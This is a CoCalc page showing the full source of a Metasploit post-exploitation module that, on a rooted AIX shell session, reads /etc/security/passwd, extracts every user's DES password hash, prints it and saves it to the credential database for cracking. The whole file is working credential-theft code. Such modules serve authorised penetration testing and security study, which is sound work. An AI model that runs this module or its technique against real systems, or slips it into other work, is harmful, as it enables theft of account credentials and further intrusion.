CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::Priv
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'AIX Gather Dump Password Hashes',
15
        'Description' => %q{ Post Module to dump the password hashes for all users on an AIX System},
16
        'License' => MSF_LICENSE,
17
        'Author' => ['theLightCosine'],
18
        'Platform' => [ 'aix' ],
19
        'SessionTypes' => [ 'shell' ]
20
      )
21
    )
22
  end
23

24
  def run
25
    if is_root?
26
      passwd_file = read_file('/etc/security/passwd')
27

28
      username = ''
29
      hash = ''
30

31
      passwd_file.each_line do |line|
32
        user_line = line.match(/(\w+):/)
33
        if user_line
34
          username = user_line[1]
35
        end
36

37
        hash_line = line.match(/password = (\w+)/)
38
        if hash_line
39
          hash = hash_line[1]
40
        end
41

42
        next unless hash.present?
43

44
        print_good "#{username}:#{hash}"
45
        credential_data = {
46
          jtr_format: 'des',
47
          origin_type: :session,
48
          post_reference_name: refname,
49
          private_type: :nonreplayable_hash,
50
          private_data: hash,
51
          session_id: session_db_id,
52
          username: username,
53
          workspace_id: myworkspace_id
54
        }
55
        create_credential(credential_data)
56
        username = ''
57
        hash = ''
58
      end
59

60
    else
61
      print_error('You must run this module as root!')
62
    end
63
  end
64
end
65

66